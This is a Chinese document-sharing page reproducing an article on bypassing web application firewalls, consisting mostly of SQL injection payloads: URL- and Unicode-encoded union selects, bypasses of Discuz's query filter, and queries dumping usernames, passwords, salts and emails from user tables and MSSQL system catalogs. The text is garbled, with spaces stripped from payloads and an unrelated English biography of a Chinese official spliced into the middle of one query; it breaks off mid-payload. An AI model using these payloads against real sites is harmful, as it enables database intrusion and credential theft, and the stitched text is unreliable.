资源描述:
《那些年我们绕过的waf》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF的绕过,希望对大家有帮助。一、各种编码绕过1、URL编码?id=1unionselectpassfromadminlimit1?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%312、Unicode编码'e'=>'%u0065',//这是他的Unicode编码?i
2、d=1unionselectpassfromadminlimit1?id=1un%u0069onsel%u0065ctpassf%u0072omadminli%u006dit13、针对disuczx内置_do_query_safe()的绕过gid=1and1=2unionselect1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13frommysql.user拦截gid=1and1=2union/*!50000select*/1,2,3,4,5,6,conc
3、at(user,0x23,password),8,9,10,11,12,13frommysql.user绕过disuczx2.0gid=@`'`unionselect@`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14frommysql.user绕过disuczx2.5gid=`'`or@`''`unionselect1from(selectcount(*),concat((selectdatabase()),floor(rand(0)*2))af
4、rominformation_schema.tablesgroupbya)bwhere@`'`绕过disuczx2.5二次修补这里我引入了`'`用来隐藏第一个@字符,并将第一个@`'`替换为@`''`,这样便可以替换掉第二个@4、绕过某waf–byhavij/*!30000unionallselect(selectdistinctconcat(0x7e,0x27,unhex(Hex(cast(schema_nameaschar))),0x27,0x7e)from`information_schema`.schema
5、talimit10,1),null,null,null,null*/--otherstaffoftheCentre.Duringthewar,ZhuwastransferredbacktoJiangxi,andDirectorofthenewOfficeinJingdezhen,JiangxiCommitteeSecretary.Startingin1939servedasrecorderoftheWestNorthOrganization,SecretaryoftheSpecialCommitteeAfterth
6、evictoryofthelongMarch,hehasbeentheNorthwestOfficeoftheFederationofStateenterprisesMinister,ShenmufuguSARmissions,DirectorofNingxiaCountypartyCommitteeSecretaryandrecorderoftheCountypartyCommitteeSecretary,Ministersandlist.php?yw=bj&id=3&id=1/*!30000unionallse
7、lect(selectconcat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27)from`gs_ucenter`.uc_memberslimit0,1),null,null,null,null*/--5、某次笔记newsid=60+a%nd%201=(se%lect%20@@VERSION)--newsid=60+a%nd%201=(se%lect%20@@servername)--newsid=60+a%nd1=(se%lectna
8、mef%rommas%ter.dbo.sysd%atabaseswh%eredbid=1)--newsid=60+a%nd(se%lectt%o%p1namef%rompedaohang.d%b%o.s%ys%obje%ctswherextype='U'a%ndnamenotin(se%lecttop1namefr%omgpbctv.dbo.sysobjec